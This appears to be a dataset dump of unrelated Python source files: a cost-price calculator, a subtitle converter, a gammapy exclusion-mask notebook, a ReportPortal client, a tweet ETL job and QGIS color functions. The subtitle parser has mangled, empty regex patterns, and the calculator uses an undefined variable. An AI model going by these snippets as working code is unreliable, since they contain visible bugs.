combined explained variance from all components\n file.write(\"Total explained ratio from {} components: {}%\\n\".format(\n count, sum))\n","sub_path":"bin/2018_07_26_random_sets_pca/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309353509","text":"def permutation(A):\n if len(A) < 2: return [A]\n soln = []\n for i in range(len(A)):\n elem = A[i]\n remain = A[:i] + A[i+1:]\n remain_perm = permutation(remain)\n for perm in remain_perm:\n soln.append([elem] + perm)\n return soln\n","sub_path":"recursion/permutation/py/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442170915","text":"def load_mecab(text_name):\n with open(text_name) as f:\n text = f.read()\n\n mecab = []\n text = text.split(\"\\n\")\n for line in text:\n line = line.split(\"\\t\")\n if len(line) < 2:\n break\n line2 = line[1].replace(\"*,\", \"\").split(\",\")\n mapping = {\n \"surface\": line[0],\n \"base\": line2[-3],\n \"pos\": line2[0],\n \"pos1\": line2[1],\n }\n mecab.append(mapping)\n return mecab\n\n\ndef extract_pos(text, morpheme, pos=None, pos1=None):\n if pos is None:\n pos_name = \"pos1\"\n extract_pos_name = pos1\n else:\n pos_name = \"pos\"\n extract_pos_name = pos\n\n verb = [\n mapping[morpheme] for mapping in text if mapping[pos_name] == extract_pos_name\n ]\n\n return verb\n","sub_path":"4/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136976822","text":"import json\nimport os\n\n\nconfig = {\n \"dir\":{\n \"datadir\": \"/home/cactuskid13/mntpt/unil_backup/profilingbackup/\",\n \"omadir\": \"/home/cactuskid13/mntpt/OMA/jun/\"\n },\n \"orthoxmltar\":\"\",\n \"email\": \"dmoi@unil.ch\"\n}\n\ndatadir = config['dir']['datadir']\nomadir = config['dir']['omadir']\nemail = config['email']\ntarfile = config['orthoxmltar']\nif len(tarfile)==0:\n tarfile = None\n\nfor dir in config['dir'].values():\n if not os.path.isdir(dir):\n os.mkdir(path=dir)\nprint(config)\n","sub_path":"pyprofiler/build/lib/utils/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162526141","text":"#Почти счастливое число\ni = int(input())\ncount = 0\nwhile i>0:\n rem = i%10\n i = i//10\n if (rem == 4 or rem == 7):\n count = count + 1\nif (count == 4 or count == 7):\n print(\"YES\")\nelse:\n print(\"NO\")\n","sub_path":"ICPC_Beg_Contest1_F.py","file_name":"ICPC_Beg_Contest1_F.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11610778","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 10:19\n# @Author : yangxue\n# @Email : yangxue@xiyun.com.cn\n# @File : calccostprice.py\n\nfrom decimal import 
Decimal\n\n'''\n业务模式有3种,采购入库,采购退货出库,销售退货入库\n1,采购入库:库存数量(Store),成本价(Costprice),采购入库数量(Buynum),不含税采购价(Realprice)\n2,采购退货出库:库存数量(Store),成本价(Costprice),采购退货出库数量(ReturnOutnum),采购入库时不含税采购价(RealBuyprice)\n3,销售退货入库:库存数量(Store),成本价(Costprice),销售退货入库数量(ReturnInnum),销售时成本价(BuyCostprice)\n公式:\n1,fCostprice=(Store*Costprice+Buynum*Realprice)/(Store+Buynum)\n2,fCostprice=(Store*Costprice-ReturnOutnum*RealBuyprice)/(Store-ReturnOutnum)\n3,fCostprice=(Store*Costprice+ReturnInnum*BuyCostprice)/(Store+ReturnInnum)\n'''\n\n\nclass Calculate():\n def __init__(self):\n self.store=float(input('请输入商品库存: '))\n self.costprice=float(input('请输入商品成本价: '))\n\n def formatdata(self,data):\n fdata=float('%.2f'%data)\n return fdata\n\n\n def buysome(self):\n Buynum=float(input('请输入购买数量:'))\n price=float(input('请输入含税采购金额:'))\n tax=float(float(input('请输入税率(): '))/100.00)\n Realprice=float('%.2f'%(price/(1+tax)))\n taxmoney=float('%.2f'%(price-Realprice))\n fcostprice = float('%.2f'%((self.store * self.costprice + Buynum * Realprice) / (self.store + Buynum)))\n self.store+=Buynum\n self.costprice=fcostprice\n print('不含税采购价:%f,税额为 %f'%(Realprice,taxmoney))\n print('目前库存数量为:%d ,成本价为:%s'%(self.store,self.costprice))\n\n def returnoutsome(self):\n ReturnOutnum=float(input('请输入退货数量:'))\n RealBuyTaxprice=float(input('请输入采购时含税金额: '))\n tax=float(float(input('请输入税率: '))/100.00)\n RealBuyprice=float('%.2f'%(RealBuyTaxprice/(1+tax)))\n taxmoney=float(RealBuyTaxprice-RealBuyprice)\n fCostprice =float('%.2f'%((self.store*self.costprice-ReturnOutnum*RealBuyprice)/(self.store - ReturnOutnum)))\n self.store=self.store-ReturnOutnum\n self.costprice=fCostprice\n print('不含税采购价:%.2f,税额为 %.2f'%(Realprice,taxmoney))\n print('目前库存数量为:%d ,成本价为:%s' % (self.store, self.costprice))\n\n def returninsome(self):\n ReturnInnum=float(input('请输入销售退货数量: '))\n BuyCostprice=float(input('请输入销售时成本价: '))\n fcostprice=float('%.2f'%((self.store*self.costprice+ReturnInnum*BuyCostprice)/(self.store+ReturnInnum)))\n self.store+=ReturnInnum\n self.costprice=fcostprice\n print('目前库存数量为:%d ,成本价为:%s' % (self.store, self.costprice))\n\n def signalCostprice(self):\n tax=float(float(input('请输入税率: '))/100.00)\n RealBuyTaxprice = float(input('请输入销售时含税金额: '))\n x=float(float(input('请输入系数: '))/100.00)\n RealBuyprice = float('%.2f' % (RealBuyTaxprice / (1 + tax)))\n taxmoney = float('%.2f'%(RealBuyTaxprice - RealBuyprice))\n singalcostprice=float('%.2f'%((self.costprice+taxmoney)*(1.00+x)))\n print('不含税单价:%f ,税额:%f'%(RealBuyprice,taxmoney))\n print('成本单价为:',singalcostprice)\n\n def outcostprice(self):\n pass\n\n\n\n\n def Do(self):\n\n while 1:\n y=int(input('请输入业务编号:(采购入库-1,采购退货出库-2,销售退货入库-3,成本单价-4,推出-5):'))\n if y==1:\n c.buysome()\n elif y ==3:\n c.returninsome()\n elif y ==2:\n c.returnoutsome()\n elif y==4:\n c.signalCostprice()\n elif y==5:\n print('退出')\n break\n else:\n print('输入有误请重新输入!')\n continue\n\n\nif __name__ =='__main__':\n c=Calculate()\n c.Do()\n","sub_path":"demo/calccostprice.py","file_name":"calccostprice.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185428005","text":"from __future__ import division, unicode_literals\nimport sys\nimport re\nimport os\nimport chardet # For non-Unicode encoding detection\n\ndef parser(file, path):\n ext = path.rfind(\".\")\n converted_path = path[:ext]+\".vtt\"\n sbt_obj = file.read()\n first_line = sbt_obj\n file.close()\n if first_line[:7] == '\\n':\n smi_obj = sbt_obj\n # Remove language class tag\n smi_obj = re.sub('(

    )+', '', smi_obj)\n # Remove all non-numbers in SYNC tag\n smi_obj = re.sub('','',smi_obj)\n # Find empty lines (' ') and move the ms marker\n # If the actual subtitle is on the same line as the timestamp, then add a break (\\n)\n sbtl = re.search('',smi_obj)\n if len(sbtl) >= 1:\n smi_obj = re.sub('','',smi_obj)\n # Replace '
    ' with '\\n'\n smi_obj = re.sub('(
    )+', '\\n', smi_obj)\n # Convert ms into timestamp\n\n elif first_line[:2] == '1\\n' or first_line[1:3] == '1\\n':\n srt_obj = sbt_obj\n # Convert the timestamp format\n org_ts = re.findall('(\\d{0,2}?:\\d{0,2}?:\\d{0,2}?,)+', srt_obj)\n mod_ts = [a.replace(',','.') for a in org_ts]\n i = 0\n for org in org_ts:\n org = org_ts[i]\n mod = mod_ts[i]\n srt_obj = srt_obj.replace(org, mod)\n i += 1\n # Add string \"WEBVTT\" at the top\n header = \"WEBVTT\\n\\n\"\n srt_obj = header + srt_obj\n if sys.version_info <= (2,8):\n srt_obj = unicode(srt_obj).encode(\"utf-8\")\n with open(converted_path, \"w\") as converted:\n converted.write(srt_obj)\n if converted:\n converted.close()\n print(\"Successfully converted the subtitle!\")\n\n else:\n print(\"Not a valid SAMI or SubRip file!\")","sub_path":"submarine/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90342053","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Creating exclusion masks\n# \n# ## Introduction\n# \n# ### Prerequisites\n# \n# - Understanding of basic analyses in 1D or 3D.\n# - Usage of `~regions` and catalogs, see the [catalog notebook](catalog.ipynb). \n# \n# ### Context\n# \n# Background templates stored in the DL3 IRF are often not reliable enough to be used without some corrections. A set of common techniques to perform background or normalisation from the data is implemented in gammapy: reflected regions for 1D spectrum analysis, field-of-view (FoV) background or ring background for 2D and 3D analyses.\n# \n# To avoid contamination of the background estimate from gamma-ray bright regions these methods require to exclude those regions from the data used for the estimation. To do so, we use exclusion masks. They are maps containing boolean values where excluded pixels are stored as False. \n# \n# **Objective: Build an exclusion mask around the Crab nebula excluding gamma-ray sources in the region.**\n# \n# ### Proposed approach\n# \n# Here we have to build a `Map` object, we must first define its geometry and then we can determine which pixels to exclude.\n# \n# We can rely on known sources positions and properties to build a list of regions (here `~regions.SkyRegions`) enclosing most of the signal that our detector would see from these objects. We show below how to build this list manually or from an existing catalog. \n# \n# Finally, we show how to build the mask from a `MapDataset`, finding pixels which contain statistically significant signal. To do so, we use the `ExcessMapEstimator`\n# \n\n# ## Setup\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\nimport numpy as np\nfrom astropy.coordinates import SkyCoord, Angle\nfrom regions import read_ds9, CircleSkyRegion\nfrom gammapy.maps import Map, WcsGeom\nfrom gammapy.utils.regions import make_region\nfrom gammapy.catalog import SOURCE_CATALOGS\nfrom gammapy.datasets import Datasets\nfrom gammapy.estimators import ExcessMapEstimator\n\n\n# ## Create the mask from a list of regions\n# \n# One can build an exclusion mask from regions. We show here how to proceed.\n\n# ### Define the geometry\n# \n# Exclusions masks are stored in `Map` objects. One has therefore to define the geometry to use. 
Here we consider a region at the Galactic anticentre around the crab nebula.\n\n# In[ ]:\n\n\nposition = SkyCoord(83.633083, 22.0145, unit=\"deg\", frame=\"icrs\")\ngeom = WcsGeom.create(\n skydir=position, width=\"5 deg\", binsz=0.02, frame=\"galactic\"\n)\n\n\n# ### Create the list of regions\n# \n# A useful function to create region objects is `~gammapy.utils.regions.make_region`. It can take strings defining regions following the \"ds9\" format and convert them to `regions`. \n# \n# Here we use a region enclosing the Crab nebula with 0.3 degrees. The actual region size should depend on the expected PSF of the data used. We also add another region with a different shape as en example.\n\n# In[ ]:\n\n\nsome_region = make_region(\"galactic;box(185,-4,1.0,0.5, 45)\")\ncrab_region = make_region(\"icrs;circle(83.633083, 22.0145, 0.3)\")\nregions = [some_region, crab_region]\nprint(regions)\n\n\n# Equivalently the regions can be read from a ds9 file, this time using `regions.read_ds9`. \n\n# In[ ]:\n\n\n# regions = read_ds9('ds9.reg')\n\n\n# ### Create the mask map \n# \n# We can now create the map. We use the `WcsGeom.region_mask` method putting all pixels inside the regions to False.\n\n# In[ ]:\n\n\nmask_data = geom.region_mask(regions, inside=False)\nmask_map = Map.from_geom(geom, data=mask_data)\n\n\n# In[ ]:\n\n\nmask_map.plot()\n\n\n# ## Create the mask from a catalog of sources\n# \n# We can also build our list of regions from a list of catalog sources. Here we use the Fermi 4FGL catalog which we read using `~gammapy.catalog.SourceCatalog`.\n\n# In[ ]:\n\n\nfgl = SOURCE_CATALOGS.get_cls(\"4fgl\")()\n\n\n# We now select sources that are contained in the region we are interested in.\n\n# In[ ]:\n\n\ninside_geom = geom.contains(fgl.positions)\nidx = np.where(inside_geom)[0]\n\n\n# We now create the list of regions using our 0.3 degree radius a priori value. If the sources were extended, one would have to adapt the sizes to account for the larger size.\n\n# In[ ]:\n\n\nexclusion_radius = Angle(\"0.3 deg\")\nregions = [CircleSkyRegion(fgl[i].position, exclusion_radius) for i in idx]\n\n\n# Now we can build the mask map the same way as above.\n\n# In[ ]:\n\n\nmask_data = geom.region_mask(regions, inside=False)\nmask_map_catalog = Map.from_geom(geom, data=mask_data)\n\n\n# In[ ]:\n\n\nmask_map_catalog.plot()\n\n\n# ### Combining masks\n# \n# If two masks share the same geometry it is easy to combine them with `Map` arithmetics.\n\n# In[ ]:\n\n\nmask_map *= mask_map_catalog\nmask_map.plot()\n\n\n# ## Create the mask from statistically significant pixels in a dataset\n# \n# Here we want to determine an exclusion from the data directly. We will estimate the significance of the data and exclude all pixels above a given threshold.\n# \n# Here we use a dataset taken from Fermi data used in the 3FHL catalog. The dataset is already in the form of a `Datasets` object. We read it from disk. \n\n# In[ ]:\n\n\ndatasets = Datasets.read(\n \"$GAMMAPY_DATA/fermi-3fhl-crab/Fermi-LAT-3FHL_datasets.yaml\",\n \"$GAMMAPY_DATA/fermi-3fhl-crab/Fermi-LAT-3FHL_models.yaml\",\n)\n\n\n# We want to compute the significance per pixels for the data integrated over energy. We reduce the dataset to a simple image. \n\n# In[ ]:\n\n\ndataset = datasets[0].to_image()\n\n\n# We now apply a significance estimation. We integrate the counts using a correlation radius of 0.4 degree and apply regular significance estimate. 
\n\n# In[ ]:\n\n\nestimator = ExcessMapEstimator(\"0.4 deg\")\nresult = estimator.run(dataset, steps=\"ts\")\n\n\n# Finally, we copy the significance map for our mask and apply a threshold of 5 sigma to remove pixels.\n\n# In[ ]:\n\n\nmask_map_significance = result[\"significance\"].copy()\nmask_map_significance.data = mask_map_significance.data < 5.0\n\n\n# In[ ]:\n\n\nmask_map_significance.sum_over_axes().plot()\n\n\n# This method frequently yields isolated pixels or weakly significant features if one places the threshold too low. \n# \n# To overcome this issue, one can use `~skimage.filters.apply_hysteresis_threshold` . This filter allows to define two thresholds and mask only the pixels between the low and high thresholds if they are not continuously connected to a pixel above the high threshold. This allows to better preserve the structure of the excesses. \n# \n# Note that scikit-image is not a required dependency of gammapy, you might need to install it.\n# \n\n# In[ ]:\n\n\n\n\n","sub_path":"docs/0.17/_static/notebooks/exclusion_mask.py","file_name":"exclusion_mask.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497031092","text":"#!/usr/bin/python3\n# coding=utf-8\n# pylint: skip-file\n\n# Copyright 2019 getcarrier.io\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n Code from Dusty 1.0\n\"\"\"\n\nimport traceback\n\nfrom time import time\nfrom reportportal_client import ReportPortalService\n\nfrom . 
import constants # from dusty import constants\n\nrp_service = None\n\n\ndef timestamp():\n return str(int(time() * 1000))\n\n\ndef my_error_handler(exc_info):\n \"\"\"\n This callback function will be called by async service client when error occurs.\n Return True if error is not critical and you want to continue work.\n :param exc_info: result of sys.exc_info() -> (type, value, traceback)\n :return:\n \"\"\"\n traceback.print_exception(*exc_info)\n\n\ndef launch_reportportal_service(rp_config):\n if not rp_config:\n return None\n global rp_service\n\n if not rp_service:\n rp_service = ReportPortalDataWriter(endpoint=rp_config[\"rp_url\"],\n token=rp_config[\"rp_token\"],\n project=rp_config[\"rp_project\"],\n launch_name=rp_config[\"rp_launch_name\"],\n tags=rp_config[\"rp_launch_tags\"])\n rp_service.start_test()\n return rp_service\n\n\nclass ReportPortalDataWriter:\n def __init__(self, endpoint, token, project, log_batch_size=100, launch_name=None, tags=None,\n launch_doc=None, launch_id=None, verify_ssl=False):\n self.endpoint = endpoint\n self.token = token\n self.project = project\n self.log_batch_size = log_batch_size\n self.launch_name = launch_name\n self.tags = tags\n self.launch_doc = launch_doc\n self.service = None\n self.test = None\n self.verify_ssl = verify_ssl\n self.launch_id = launch_id\n\n def start_service(self):\n self.service = ReportPortalService(endpoint=self.endpoint,\n project=self.project,\n token=self.token,\n log_batch_size=self.log_batch_size,\n verify_ssl=self.verify_ssl)\n if self.launch_id:\n self.service.launch_id = self.launch_id\n\n def start_test(self):\n if not self.service:\n self.start_service()\n return self.service.start_launch(name=self.launch_name,\n start_time=timestamp(),\n description=self.launch_doc,\n tags=self.tags)\n\n def finish_test(self):\n self.service.finish_launch(end_time=timestamp())\n self.service.terminate()\n self.service = None\n\n def is_test_started(self):\n if self.service:\n return True\n return False\n\n def start_test_item(self, issue, description, item_type='STEP'):\n return self.service.start_test_item(issue, description=description,\n start_time=timestamp(),\n item_type=item_type)\n\n def test_item_message(self, message, level=\"ERROR\", attachment=None):\n if len(message) > constants.MAX_MESSAGE_LEN:\n index = 0\n while index < len(message):\n increment = constants.MAX_MESSAGE_LEN\n if index + increment > len(message):\n increment = len(message) - index\n self.service.log(time=timestamp(), message=message[index:index+increment],\n level=level, attachment=attachment)\n index = index+increment\n else:\n self.service.log(time=timestamp(), message=message,\n level=level, attachment=attachment)\n\n def finish_test_item(self, item_id, status=\"FAILED\"):\n self.service.finish_test_item(item_id=item_id, end_time=timestamp(),\n status=status)\n","sub_path":"dusty/reporters/reportportal/legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"389625926","text":"\n\n#calss header\nclass _INCONCEIVABLE():\n\tdef __init__(self,): \n\t\tself.name = \"INCONCEIVABLE\"\n\t\tself.definitions = [u'impossible to imagine or think of: ', u'extremely unlikely: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = 
self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_inconceivable.py","file_name":"_inconceivable.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232548896","text":"import pymongo\nimport time\nimport os\nimport re\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sqlalchemy import create_engine\n\n# Postgres environment variables\nHOST = 'post_db' # postgres container\nUSER = os.getenv('POSTGRES_USER')\nPW = os.getenv('POSTGRES_PASSWORD')\nDB = os.getenv('POSTGRES_DB')\n\n# Lag time for starting up MongoDB-Database\ntime.sleep(10)\n\n# Connect to MongoDB database in the Docker-Container 'mongodb'\nclient = pymongo.MongoClient('mongodb')\n# access the database with in MongoDB\ndb = client.tweets\n\n# Sentiment Analysis\ns = SentimentIntensityAnalyzer()\n# Clean text\ndef clean_text(text):\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(\\w+:\\/\\/\\S+)|(#[A-Za-z0-9]+)|([^A-Za-z0-9 ]|(RT))\",\" \",text).split())\n\n# Connect to Postgres DB \n#pg = create_engine(f'postgres://postgres:3455@post_db:5432/post_etl', echo=True)\npg = create_engine(f'postgres://{USER}:{PW}@{HOST}:5432/{DB}', echo=True)\n\n# Create a Table in the Postgres Database\npg.execute('''\n CREATE TABLE IF NOT EXISTS tweets (\n time_created TIMESTAMP,\n text VARCHAR(500),\n username VARCHAR(30),\n followers INTEGER,\n sentiment NUMERIC\n );\n''')\n\n# Insert data from MongoDB to Postgres DB\n\ntimestamp = None\n\nwhile True:\n # Populate postgres_db every 10s with new values by selecting only entries which hasn't been added to db\n if not timestamp:\n entries = db.tweets.find()\n else:\n entries = db.tweets.find({\"timestamp\" :{\"$gt\" : timestamp}})\n \n for e in entries:\n timestamp = e['timestamp']\n time_created = e['time_created']\n text = e['text']\n username = e['username']\n followers = e['followers_count']\n sentiment = s.polarity_scores(clean_text(e['text']))\n score = sentiment['compound']\n ## Query check for duplicates according to time_created\n query = \"\"\"INSERT INTO tweets(time_created, text, username, followers, sentiment) \n SELECT %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT * FROM tweets WHERE tweets.time_created = %s)\"\"\"\n pg.execute(query, (time_created, text, username, followers, score, time_created))\n time.sleep(10)","sub_path":"etl_job/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618326985","text":"\"\"\"\r\nExtra functions for QgsExpression\r\n\r\nregister=False in order to delay registring of functions before we load the plugin\r\n\"\"\"\r\n\r\nfrom qgis.utils import qgsfunction\r\nfrom qgis.core import QgsStyleV2, QgsExpression, QgsSymbolLayerV2Utils\r\nfrom PyQt4.QtCore import QObject, QDateTime, QDate\r\nfrom PyQt4.QtGui import QColor\r\n\r\ndef getFloat(value):\r\n try:\r\n return value, None\r\n except ValueError:\r\n return 0, \"Can not convert {} to float\".format(value)\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef ramp_color_rgb(values, feature, parent):\r\n \"\"\"\r\n Return only the rgb part of a defined color ramp\r\n \r\n

    Syntax

    \r\n ramp_color_rgb(ramp_name,value)

    \r\n\r\n

    Arguments

    \r\n ramp_name → the name of the color ramp as a string, for example 'Spectral'.
    \r\n value → the position on the ramp to select the color from as a real number between 0 and 1.

    \r\n \r\n

    Example

    \r\n \r\n ramp_color_rgb('Spectral',0.3) → '253,190,115'

    \r\n \r\n

    Note:

    \r\n The color ramps available vary between QGIS installations. This function\r\n may not give the expected results if you move your Quantum project.\r\n

    \r\n \"\"\" \r\n ramp_name = values[0]\r\n ramp_position = values[1]\r\n \r\n ramp = QgsStyleV2.defaultStyle().colorRampRef(ramp_name)\r\n if not ramp:\r\n parent.setEvalErrorString( QObject.tr( '\"{}\" is not a valid color ramp'.format(ramp_name)))\r\n return QColor(0,0,0).name()\r\n \r\n value, error = getFloat(ramp_position)\r\n if error:\r\n parent.setEvalErrorString(error)\r\n \r\n color = ramp.color(value)\r\n return \"{},{},{}\".format(color.red(), color.green(), color.blue())\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef red(values, feature, parent):\r\n \"\"\"\r\n Returns the red component of a color\r\n \r\n

    Syntax

    \r\n red(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n red('255,0,0') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).red()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef green(values, feature, parent):\r\n \"\"\"\r\n Returns the green component of a color\r\n \r\n

    Syntax

    \r\n green(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n green('0,255,0') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).green()\r\n except:\r\n return None \r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef blue(values, feature, parent):\r\n \"\"\"\r\n Returns the blue component of a color\r\n \r\n

    Syntax

    \r\n blue(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n blue('0,0,255') → 255

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).blue()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef alpha(values, feature, parent):\r\n \"\"\"\r\n Returns the alpha component of a color\r\n \r\n

    Syntax

    \r\n alpha(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n alpha('255,255,255,125') → 125

    \r\n \"\"\" \r\n try:\r\n return QgsSymbolLayerV2Utils.decodeColor(values[0]).alpha()\r\n except:\r\n return None\r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef hue(values, feature, parent):\r\n \"\"\"\r\n Returns the hue component of a color, an integer between 0-360\r\n \r\n

    Syntax

    \r\n hue(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n hue('255,0,0') → 0

    \r\n \"\"\" \r\n try:\r\n # Hue ranges from 0 - 360\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).hueF() * 360)\r\n except:\r\n return None \r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef saturation(values, feature, parent):\r\n \"\"\"\r\n Returns the saturation of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n saturation(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n saturation('125,255,125') → 50

    \r\n \"\"\" \r\n try:\r\n # Saturation ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).saturationF() * 100)\r\n except:\r\n return None\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef lightness(values, feature, parent):\r\n \"\"\"\r\n Returns the lightness of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n lightness(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n lightness('125,255,125') → 74

    \r\n \"\"\" \r\n try:\r\n # Lightness ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).lightnessF() * 100)\r\n except:\r\n return None\r\n\r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef hsv_value(values, feature, parent):\r\n \"\"\"\r\n Returns the hsv value component of a color, an integer between 0-100\r\n \r\n

    Syntax

    \r\n hsv_value(color)

    \r\n\r\n

    Arguments

    \r\n color → a color

    \r\n \r\n

    Example

    \r\n \r\n hsv_value('125,255,125') → 100

    \r\n \"\"\" \r\n try:\r\n # Value ranges from 0 - 100\r\n return int(QgsSymbolLayerV2Utils.decodeColor(values[0]).valueF() * 100)\r\n except:\r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_red(values, feature, parent):\r\n \"\"\"\r\n Sets the red component of a color\r\n \r\n

    Syntax

    \r\n set_red(color, red)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n red → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_red('255,255,255', 125) → '125,255,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setRed(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_green(values, feature, parent):\r\n \"\"\"\r\n Sets the green component of a color\r\n \r\n

    Syntax

    \r\n set_green(color, blue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n green → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_green('255,255,255', 125) → '255,125,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setGreen(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_blue(values, feature, parent):\r\n \"\"\"\r\n Sets the blue component of a color\r\n \r\n

    Syntax

    \r\n set_blue(color, blue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n blue → a integer between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_blue('255,255,255', 125) → '255,255,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setBlue(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_hue(values, feature, parent):\r\n \"\"\"\r\n Sets the hue component of a color\r\n \r\n

    Syntax

    \r\n set_hue(color, hue)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n hue → a integer between 0 and 360

    \r\n \r\n

    Example

    \r\n \r\n set_hue('0,255,0,255', 0) → '255,0,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(values[1] / 360.0, color.saturationF(), color.lightnessF(), color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_saturation(values, feature, parent):\r\n \"\"\"\r\n Sets the saturation of a color\r\n \r\n

    Syntax

    \r\n set_saturation(color, saturation)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n saturation → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_saturation('0,255,0,255', 0) → '128,128,128,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(color.hueF(), values[1] / 100.0, color.lightnessF(), color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n \r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_lightness(values, feature, parent):\r\n \"\"\"\r\n Sets the lightness of a color\r\n \r\n

